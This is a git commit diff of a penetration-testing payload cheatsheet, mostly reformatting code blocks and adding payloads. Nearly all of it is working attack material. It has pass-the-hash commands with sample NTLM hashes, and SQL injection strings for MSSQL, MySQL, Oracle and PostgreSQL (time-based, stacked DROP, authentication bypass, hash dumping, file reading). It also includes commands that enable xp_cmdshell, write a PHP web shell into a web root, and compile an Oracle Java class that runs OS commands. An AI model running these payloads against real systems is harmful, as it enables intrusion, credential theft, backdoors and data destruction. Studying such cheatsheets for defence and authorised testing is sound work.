SQL Cheatsheets - Refactoring part 1
parent
81eebeaea2
commit
f1cb7ce50e
@ -22,7 +22,7 @@
|
|||||||
|
|
||||||
## Tools
|
## Tools
|
||||||
|
|
||||||
* [Impacket](https://github.com/CoreSecurity/impacket)
|
* [Impacket](https://github.com/CoreSecurity/impacket) or the [Windows version](https://github.com/maaaaz/impacket-examples-windows)
|
||||||
* [Responder](https://github.com/SpiderLabs/Responder)
|
* [Responder](https://github.com/SpiderLabs/Responder)
|
||||||
* [Mimikatz](https://github.com/gentilkiwi/mimikatz)
|
* [Mimikatz](https://github.com/gentilkiwi/mimikatz)
|
||||||
* [Ranger](https://github.com/funkandwagnalls/ranger)
|
* [Ranger](https://github.com/funkandwagnalls/ranger)
|
||||||
@ -157,18 +157,21 @@ https://room362.com/post/2016/kerberoast-pt1/
|
|||||||
```
|
```
|
||||||
|
|
||||||
### Pass-the-Hash
|
### Pass-the-Hash
|
||||||
Note: the password can be replaced by a hash to execute a `pass the hash` attack.
|
The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes.
|
||||||
```c
|
```c
|
||||||
use exploit/windows/smb/psexec
|
use exploit/windows/smb/psexec
|
||||||
set RHOST 10.2.0.3
|
set RHOST 10.2.0.3
|
||||||
set SMBUser jarrieta
|
set SMBUser jarrieta
|
||||||
set SMBPass nastyCutt3r
|
set SMBPass nastyCutt3r
|
||||||
|
// NOTE1: The password can be replaced by a hash to execute a `pass the hash` attack.
|
||||||
|
// NOTE2: Require the full NTLM hash, you may need to add the "blank" LM (aad3b435b51404eeaad3b435b51404ee)
|
||||||
set PAYLOAD windows/meterpreter/bind_tcp
|
set PAYLOAD windows/meterpreter/bind_tcp
|
||||||
run
|
run
|
||||||
shell
|
shell
|
||||||
|
|
||||||
or with crackmapexec
|
or with crackmapexec
|
||||||
cme smb 10.2.0.2 -u jarrieta -H 'aad3b435b51404eeaad3b435b51404ee:489a04c09a5debbc9b975356693e179d' -x "whoami"
|
cme smb 10.2.0.2 -u jarrieta -H 'aad3b435b51404eeaad3b435b51404ee:489a04c09a5debbc9b975356693e179d' -x "whoami"
|
||||||
|
also works with net range : cme smb 10.2.0.2/24 ...
|
||||||
|
|
||||||
or with psexec
|
or with psexec
|
||||||
proxychains python ./psexec.py jarrieta@10.2.0.2 -hashes :489a04c09a5debbc9b975356693e179d
|
proxychains python ./psexec.py jarrieta@10.2.0.2 -hashes :489a04c09a5debbc9b975356693e179d
|
||||||
|
@ -1,23 +1,23 @@
|
|||||||
# MSSQL Injection
|
# MSSQL Injection
|
||||||
|
|
||||||
## MSSQL version
|
## MSSQL version
|
||||||
```
|
```sql
|
||||||
SELECT @@version
|
SELECT @@version
|
||||||
```
|
```
|
||||||
|
|
||||||
## MSSQL database name
|
## MSSQL database name
|
||||||
```
|
```sql
|
||||||
SELECT DB_NAME()
|
SELECT DB_NAME()
|
||||||
```
|
```
|
||||||
|
|
||||||
## MSSQL List Databases
|
## MSSQL List Databases
|
||||||
```
|
```sql
|
||||||
SELECT name FROM master..sysdatabases;
|
SELECT name FROM master..sysdatabases;
|
||||||
SELECT DB_NAME(N); — for N = 0, 1, 2, …
|
SELECT DB_NAME(N); — for N = 0, 1, 2, …
|
||||||
```
|
```
|
||||||
|
|
||||||
## MSSQL List Column
|
## MSSQL List Column
|
||||||
```
|
```sql
|
||||||
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘mytable’); — for the current DB only
|
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘mytable’); — for the current DB only
|
||||||
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable
|
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable
|
||||||
|
|
||||||
@ -25,7 +25,7 @@ SELECT table_catalog, column_name FROM information_schema.columns
|
|||||||
```
|
```
|
||||||
|
|
||||||
## MSSQL List Tables
|
## MSSQL List Tables
|
||||||
```
|
```sql
|
||||||
SELECT name FROM master..sysobjects WHERE xtype = ‘U’; — use xtype = ‘V’ for views
|
SELECT name FROM master..sysobjects WHERE xtype = ‘U’; — use xtype = ‘V’ for views
|
||||||
SELECT name FROM someotherdb..sysobjects WHERE xtype = ‘U’;
|
SELECT name FROM someotherdb..sysobjects WHERE xtype = ‘U’;
|
||||||
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable
|
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable
|
||||||
@ -35,7 +35,7 @@ SELECT table_catalog, table_name FROM information_schema.columns
|
|||||||
|
|
||||||
|
|
||||||
## MSSQL User Password
|
## MSSQL User Password
|
||||||
```
|
```sql
|
||||||
MSSQL 2000:
|
MSSQL 2000:
|
||||||
SELECT name, password FROM master..sysxlogins
|
SELECT name, password FROM master..sysxlogins
|
||||||
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins (Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.)
|
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins (Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.)
|
||||||
@ -46,7 +46,7 @@ SELECT name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) from master.
|
|||||||
```
|
```
|
||||||
|
|
||||||
## MSSQL Error based
|
## MSSQL Error based
|
||||||
```
|
```sql
|
||||||
For integer inputs : convert(int,@@version)
|
For integer inputs : convert(int,@@version)
|
||||||
For integer inputs : cast((SELECT @@version) as int)
|
For integer inputs : cast((SELECT @@version) as int)
|
||||||
|
|
||||||
@ -56,7 +56,7 @@ For string inputs : ' + cast((SELECT @@version) as int) + '
|
|||||||
|
|
||||||
|
|
||||||
## MSSQL Blind based
|
## MSSQL Blind based
|
||||||
```
|
```sql
|
||||||
SELECT @@version WHERE @@version LIKE '%12.0.2000.8%'
|
SELECT @@version WHERE @@version LIKE '%12.0.2000.8%'
|
||||||
|
|
||||||
WITH data AS (SELECT (ROW_NUMBER() OVER (ORDER BY message)) as row,* FROM log_table)
|
WITH data AS (SELECT (ROW_NUMBER() OVER (ORDER BY message)) as row,* FROM log_table)
|
||||||
@ -64,22 +64,30 @@ SELECT message FROM data WHERE row = 1 and message like 't%'
|
|||||||
```
|
```
|
||||||
|
|
||||||
## MSSQL Time based
|
## MSSQL Time based
|
||||||
```
|
```sql
|
||||||
ProductID=1;waitfor delay '0:0:10'--
|
ProductID=1;waitfor delay '0:0:10'--
|
||||||
ProductID=1);waitfor delay '0:0:10'--
|
ProductID=1);waitfor delay '0:0:10'--
|
||||||
ProductID=1';waitfor delay '0:0:10'--
|
ProductID=1';waitfor delay '0:0:10'--
|
||||||
ProductID=1');waitfor delay '0:0:10'--
|
ProductID=1');waitfor delay '0:0:10'--
|
||||||
ProductID=1));waitfor delay '0:0:10'--
|
ProductID=1));waitfor delay '0:0:10'--
|
||||||
|
|
||||||
|
IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' comment: --
|
||||||
|
```
|
||||||
|
|
||||||
|
## MSSQL Stacked Query
|
||||||
|
Use a semi-colon ";" to add another query
|
||||||
|
```sql
|
||||||
|
ProductID=1; DROP members--
|
||||||
```
|
```
|
||||||
|
|
||||||
## MSSQL Command execution
|
## MSSQL Command execution
|
||||||
```
|
```sql
|
||||||
EXEC xp_cmdshell "net user";
|
EXEC xp_cmdshell "net user";
|
||||||
EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'
|
EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'
|
||||||
EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1'
|
EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1'
|
||||||
```
|
```
|
||||||
If you need to reactivate xp_cmdshell (disabled by default in SQL Server 2005)
|
If you need to reactivate xp_cmdshell (disabled by default in SQL Server 2005)
|
||||||
```
|
```sql
|
||||||
EXEC sp_configure 'show advanced options',1
|
EXEC sp_configure 'show advanced options',1
|
||||||
RECONFIGURE
|
RECONFIGURE
|
||||||
EXEC sp_configure 'xp_cmdshell',1
|
EXEC sp_configure 'xp_cmdshell',1
|
||||||
@ -87,7 +95,7 @@ RECONFIGURE
|
|||||||
```
|
```
|
||||||
|
|
||||||
## MSSQL Make user DBA (DB admin)
|
## MSSQL Make user DBA (DB admin)
|
||||||
```
|
```sql
|
||||||
EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;
|
EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;
|
||||||
```
|
```
|
||||||
|
|
||||||
|
@ -1,8 +1,16 @@
|
|||||||
# MYSQL Injection
|
# MYSQL Injection
|
||||||
|
|
||||||
|
## MySQL Comment
|
||||||
|
```sql
|
||||||
|
# MYSQL Comment
|
||||||
|
/* MYSQL Comment */
|
||||||
|
/*! MYSQL Special SQL */
|
||||||
|
/*!32302 10*/ Comment for MySQL version 3.23.02
|
||||||
|
```
|
||||||
|
|
||||||
## Detect columns number
|
## Detect columns number
|
||||||
Using a simple ORDER
|
Using a simple ORDER
|
||||||
```
|
```sql
|
||||||
order by 1
|
order by 1
|
||||||
order by 2
|
order by 2
|
||||||
order by 3
|
order by 3
|
||||||
@ -11,7 +19,7 @@ order by XXX
|
|||||||
```
|
```
|
||||||
|
|
||||||
## MySQL Union Based
|
## MySQL Union Based
|
||||||
```
|
```sql
|
||||||
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
|
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
|
||||||
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=...
|
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=...
|
||||||
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_schema.columns+wHeRe+table_name=...
|
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_schema.columns+wHeRe+table_name=...
|
||||||
@ -19,13 +27,13 @@ UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
|
|||||||
```
|
```
|
||||||
|
|
||||||
## MySQL Error Based - Basic
|
## MySQL Error Based - Basic
|
||||||
```
|
```sql
|
||||||
(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
|
(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
|
||||||
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
|
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
|
||||||
```
|
```
|
||||||
|
|
||||||
## MYSQL Error Based - UpdateXML function
|
## MYSQL Error Based - UpdateXML function
|
||||||
```
|
```sql
|
||||||
AND updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)-
|
AND updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)-
|
||||||
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)),null)--
|
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)),null)--
|
||||||
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)),null)--
|
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)),null)--
|
||||||
@ -34,13 +42,13 @@ AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) F
|
|||||||
```
|
```
|
||||||
|
|
||||||
Shorter to read:
|
Shorter to read:
|
||||||
```
|
```sql
|
||||||
' and updatexml(null,concat(0x0a,version()),null)-- -
|
' and updatexml(null,concat(0x0a,version()),null)-- -
|
||||||
' and updatexml(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1)),null)-- -
|
' and updatexml(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1)),null)-- -
|
||||||
```
|
```
|
||||||
|
|
||||||
## MYSQL Error Based - Extractvalue function
|
## MYSQL Error Based - Extractvalue function
|
||||||
```
|
```sql
|
||||||
AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))--
|
AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))--
|
||||||
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)))--
|
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)))--
|
||||||
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)))--
|
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)))--
|
||||||
@ -50,21 +58,21 @@ AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)
|
|||||||
|
|
||||||
## MYSQL Blind using a conditional statement
|
## MYSQL Blind using a conditional statement
|
||||||
TRUE: `if @@version starts with a 5`:
|
TRUE: `if @@version starts with a 5`:
|
||||||
```
|
```sql
|
||||||
2100935' OR IF(MID(@@version,1,1)='5',sleep(1),1)='2
|
2100935' OR IF(MID(@@version,1,1)='5',sleep(1),1)='2
|
||||||
Response:
|
Response:
|
||||||
HTTP/1.1 500 Internal Server Error
|
HTTP/1.1 500 Internal Server Error
|
||||||
```
|
```
|
||||||
|
|
||||||
False: `if @@version starts with a 4`:
|
False: `if @@version starts with a 4`:
|
||||||
```
|
```sql
|
||||||
2100935' OR IF(MID(@@version,1,1)='4',sleep(1),1)='2
|
2100935' OR IF(MID(@@version,1,1)='4',sleep(1),1)='2
|
||||||
Response:
|
Response:
|
||||||
HTTP/1.1 200 OK
|
HTTP/1.1 200 OK
|
||||||
```
|
```
|
||||||
|
|
||||||
## MYSQL Blind with MAKE_SET
|
## MYSQL Blind with MAKE_SET
|
||||||
```
|
```sql
|
||||||
AND MAKE_SET(YOLO<(SELECT(length(version()))),1)
|
AND MAKE_SET(YOLO<(SELECT(length(version()))),1)
|
||||||
AND MAKE_SET(YOLO<ascii(substring(version(),POS,1)),1)
|
AND MAKE_SET(YOLO<ascii(substring(version(),POS,1)),1)
|
||||||
AND MAKE_SET(YOLO<(SELECT(length(concat(login,password)))),1)
|
AND MAKE_SET(YOLO<(SELECT(length(concat(login,password)))),1)
|
||||||
@ -72,26 +80,30 @@ AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
|
|||||||
```
|
```
|
||||||
|
|
||||||
## MYSQL Time Based
|
## MYSQL Time Based
|
||||||
```
|
```sql
|
||||||
+BENCHMARK(40000000,SHA1(1337))+
|
+BENCHMARK(40000000,SHA1(1337))+
|
||||||
'%2Bbenchmark(3200,SHA1(1))%2B'
|
'%2Bbenchmark(3200,SHA1(1))%2B'
|
||||||
' OR IF(MID(@@version,1,1)='5',sleep(1),1)='2
|
' OR IF(MID(@@version,1,1)='5',sleep(1),1)='2
|
||||||
|
|
||||||
|
AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) //SHA1
|
||||||
|
RLIKE SLEEP([SLEEPTIME])
|
||||||
|
OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## MYSQL Read content of a file
|
## MYSQL Read content of a file
|
||||||
```
|
```sql
|
||||||
' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
|
' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
|
||||||
```
|
```
|
||||||
|
|
||||||
## MySQL DIOS - Dump in One Shot
|
## MySQL DIOS - Dump in One Shot
|
||||||
```
|
```sql
|
||||||
(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a)#
|
(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a)#
|
||||||
(select (@) from (select(@:=0x00),(select (@) from (db_data.table_data) where (@)in (@:=concat(@,0x0D,0x0A,0x7C,' [ ',column_data1,' ] > ',column_data2,' > ',0x7C))))a)#
|
(select (@) from (select(@:=0x00),(select (@) from (db_data.table_data) where (@)in (@:=concat(@,0x0D,0x0A,0x7C,' [ ',column_data1,' ] > ',column_data2,' > ',0x7C))))a)#
|
||||||
```
|
```
|
||||||
|
|
||||||
## MYSQL DROP SHELL
|
## MYSQL DROP SHELL
|
||||||
```
|
```sql
|
||||||
SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"
|
SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"
|
||||||
SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '<?php phpinfo();?>
|
SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '<?php phpinfo();?>
|
||||||
-1 UNION SELECT 0xPHP_PAYLOAD_IN_HEX, NULL, NULL INTO DUMPILE 'C:/Program Files/EasyPHP-12.1/www/shell.php'
|
-1 UNION SELECT 0xPHP_PAYLOAD_IN_HEX, NULL, NULL INTO DUMPILE 'C:/Program Files/EasyPHP-12.1/www/shell.php'
|
||||||
|
@ -1,12 +1,12 @@
|
|||||||
# Oracle SQL Injection
|
# Oracle SQL Injection
|
||||||
|
|
||||||
## Oracle SQL version
|
## Oracle SQL version
|
||||||
```
|
```sql
|
||||||
SELECT user FROM dual UNION SELECT * FROM v$version
|
SELECT user FROM dual UNION SELECT * FROM v$version
|
||||||
```
|
```
|
||||||
|
|
||||||
## Oracle SQL database name
|
## Oracle SQL database name
|
||||||
```
|
```sql
|
||||||
SELECT global_name FROM global_name;
|
SELECT global_name FROM global_name;
|
||||||
SELECT name FROM V$DATABASE;
|
SELECT name FROM V$DATABASE;
|
||||||
SELECT instance_name FROM V$INSTANCE;
|
SELECT instance_name FROM V$INSTANCE;
|
||||||
@ -14,18 +14,18 @@ SELECT SYS.DATABASE_NAME FROM DUAL;
|
|||||||
```
|
```
|
||||||
|
|
||||||
## Oracle SQL List Databases
|
## Oracle SQL List Databases
|
||||||
```
|
```sql
|
||||||
SELECT DISTINCT owner FROM all_tables;
|
SELECT DISTINCT owner FROM all_tables;
|
||||||
```
|
```
|
||||||
|
|
||||||
## Oracle SQL List Column
|
## Oracle SQL List Column
|
||||||
```
|
```sql
|
||||||
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
|
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
|
||||||
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' and owner = 'foo';
|
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' and owner = 'foo';
|
||||||
```
|
```
|
||||||
|
|
||||||
## Oracle SQL List Tables
|
## Oracle SQL List Tables
|
||||||
```
|
```sql
|
||||||
SELECT table_name FROM all_tables;
|
SELECT table_name FROM all_tables;
|
||||||
SELECT owner, table_name FROM all_tables;
|
SELECT owner, table_name FROM all_tables;
|
||||||
SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';
|
SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';
|
||||||
@ -52,10 +52,13 @@ SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';
|
|||||||
| Column message exists in table log_table | SELEC COUNT(*) FROM user_tab_cols WHERE column_name = 'MESSAGE' AND table_name = 'LOG_TABLE'; |
|
| Column message exists in table log_table | SELEC COUNT(*) FROM user_tab_cols WHERE column_name = 'MESSAGE' AND table_name = 'LOG_TABLE'; |
|
||||||
| First letter of first message is t | SELEC message FROM log_table WHERE rownum=1 AND message LIKE 't%'; |
|
| First letter of first message is t | SELEC message FROM log_table WHERE rownum=1 AND message LIKE 't%'; |
|
||||||
|
|
||||||
|
## Oracle SQL Time based
|
||||||
|
```sql
|
||||||
|
AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) comment: -- /**/
|
||||||
|
```
|
||||||
|
|
||||||
## Oracle SQL Command execution
|
## Oracle SQL Command execution
|
||||||
```
|
```sql
|
||||||
/* create Java class */
|
/* create Java class */
|
||||||
BEGIN
|
BEGIN
|
||||||
EXECUTE IMMEDIATE 'create or replace and compile java source named "PwnUtil" as import java.io.*; public class PwnUtil{ public static String runCmd(String args){ try{ BufferedReader myReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream()));String stemp, str = "";while ((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}} public static String readFile(String filename){ try{ BufferedReader myReader = new BufferedReader(new FileReader(filename));String stemp, str = "";while((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}}};';
|
EXECUTE IMMEDIATE 'create or replace and compile java source named "PwnUtil" as import java.io.*; public class PwnUtil{ public static String runCmd(String args){ try{ BufferedReader myReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream()));String stemp, str = "";while ((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}} public static String readFile(String filename){ try{ BufferedReader myReader = new BufferedReader(new FileReader(filename));String stemp, str = "";while((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}}};';
|
||||||
@ -72,7 +75,7 @@ SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;
|
|||||||
```
|
```
|
||||||
or (hex encoded)
|
or (hex encoded)
|
||||||
|
|
||||||
```
|
```sql
|
||||||
/* create Java class */
|
/* create Java class */
|
||||||
SELECT TO_CHAR(dbms_xmlquery.getxml('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate utl_raw.cast_to_varchar2(hextoraw(''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''));
|
SELECT TO_CHAR(dbms_xmlquery.getxml('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate utl_raw.cast_to_varchar2(hextoraw(''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''));
|
||||||
EXECUTE IMMEDIATE utl_raw.cast_to_varchar2(hextoraw(''637265617465206f72207265706c6163652066756e6374696f6e2050776e5574696c46756e6328705f636d6420696e207661726368617232292072657475726e207661726368617232206173206c616e6775616765206a617661206e616d65202770776e7574696c2e72756e286a6176612e6c616e672e537472696e67292072657475726e20537472696e67273b'')); end;')) results FROM dual
|
EXECUTE IMMEDIATE utl_raw.cast_to_varchar2(hextoraw(''637265617465206f72207265706c6163652066756e6374696f6e2050776e5574696c46756e6328705f636d6420696e207661726368617232292072657475726e207661726368617232206173206c616e6775616765206a617661206e616d65202770776e7574696c2e72756e286a6176612e6c616e672e537472696e67292072657475726e20537472696e67273b'')); end;')) results FROM dual
|
||||||
|
@ -1,9 +1,21 @@
|
|||||||
# POSTGRESQL
|
# POSTGRESQL
|
||||||
|
|
||||||
##PostgreSQL Error Based - Basic
|
## PostgreSQL Comment
|
||||||
|
```
|
||||||
|
--
|
||||||
|
/**/
|
||||||
|
```
|
||||||
|
|
||||||
|
## PostgreSQL Error Based - Basic
|
||||||
```
|
```
|
||||||
,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC)
|
,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC)
|
||||||
,cAsT(chr(126)||(sEleCt+table_name+fRoM+information_schema.tables+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
|
,cAsT(chr(126)||(sEleCt+table_name+fRoM+information_schema.tables+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
|
||||||
,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name=data_column+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
|
,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name=data_column+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
|
||||||
,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)
|
,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)
|
||||||
|
```
|
||||||
|
|
||||||
|
## PostgreSQL Time Based
|
||||||
|
```
|
||||||
|
AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
|
||||||
|
AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
|
||||||
```
|
```
|
@ -1,11 +1,20 @@
|
|||||||
# SQL injection
|
# SQL injection
|
||||||
A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application
|
A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application
|
||||||
|
|
||||||
|
## Summary
|
||||||
|
* [Entry point detection](#)
|
||||||
|
* [DBMS Identification](#)
|
||||||
|
* [SQL injection using SQLmap](#)
|
||||||
|
* [Authentication bypass](#)
|
||||||
|
* [Polyglot injection](#)
|
||||||
|
* [Insert Statement - ON DUPLICATE KEY UPDATE](#)
|
||||||
|
* [WAF Bypass](#)
|
||||||
|
|
||||||
|
|
||||||
## Entry point detection
|
## Entry point detection
|
||||||
Detection of an SQL injection entry point
|
Detection of an SQL injection entry point
|
||||||
Simple characters
|
Simple characters
|
||||||
```
|
```sql
|
||||||
'
|
'
|
||||||
%27
|
%27
|
||||||
"
|
"
|
||||||
@ -19,13 +28,13 @@ Wildcard (*)
|
|||||||
```
|
```
|
||||||
|
|
||||||
Multiple encoding
|
Multiple encoding
|
||||||
```
|
```sql
|
||||||
%%2727
|
%%2727
|
||||||
%25%27
|
%25%27
|
||||||
```
|
```
|
||||||
|
|
||||||
Merging characters
|
Merging characters
|
||||||
```
|
```sql
|
||||||
`+HERP
|
`+HERP
|
||||||
'||'DERP
|
'||'DERP
|
||||||
'+'herp
|
'+'herp
|
||||||
@ -51,7 +60,7 @@ transformed into U+0027 APOSTROPHE (')
|
|||||||
```
|
```
|
||||||
|
|
||||||
## DBMS Identification
|
## DBMS Identification
|
||||||
```
|
```c
|
||||||
["conv('a',16,2)=conv('a',16,2)" ,"MYSQL"],
|
["conv('a',16,2)=conv('a',16,2)" ,"MYSQL"],
|
||||||
["connection_id()=connection_id()" ,"MYSQL"],
|
["connection_id()=connection_id()" ,"MYSQL"],
|
||||||
["crc32('MySQL')=crc32('MySQL')" ,"MYSQL"],
|
["crc32('MySQL')=crc32('MySQL')" ,"MYSQL"],
|
||||||
@ -169,12 +178,14 @@ tamper=name_of_the_tamper
|
|||||||
|xforwardedfor.py | Append a fake HTTP header 'X-Forwarded-For'|
|
|xforwardedfor.py | Append a fake HTTP header 'X-Forwarded-For'|
|
||||||
|
|
||||||
## Authentication bypass
|
## Authentication bypass
|
||||||
```
|
```sql
|
||||||
'-'
|
'-'
|
||||||
' '
|
' '
|
||||||
'&'
|
'&'
|
||||||
'^'
|
'^'
|
||||||
'*'
|
'*'
|
||||||
|
' or 1=1 limit 1 -- -+
|
||||||
|
'="or'
|
||||||
' or ''-'
|
' or ''-'
|
||||||
' or '' '
|
' or '' '
|
||||||
' or ''&'
|
' or ''&'
|
||||||
@ -258,26 +269,15 @@ admin") or "1"="1"/*
|
|||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
||||||
```
|
```
|
||||||
|
|
||||||
## Time based
|
|
||||||
```
|
|
||||||
SQLite : AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) comment: -- /**/
|
|
||||||
MySQL/MariaDB : AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) //SHA1 comment: # -- /*!30100 MySQL code*/
|
|
||||||
MySQL/MariaDB : RLIKE SLEEP([SLEEPTIME]) comment: # -- /*!30100 MySQL code*/
|
|
||||||
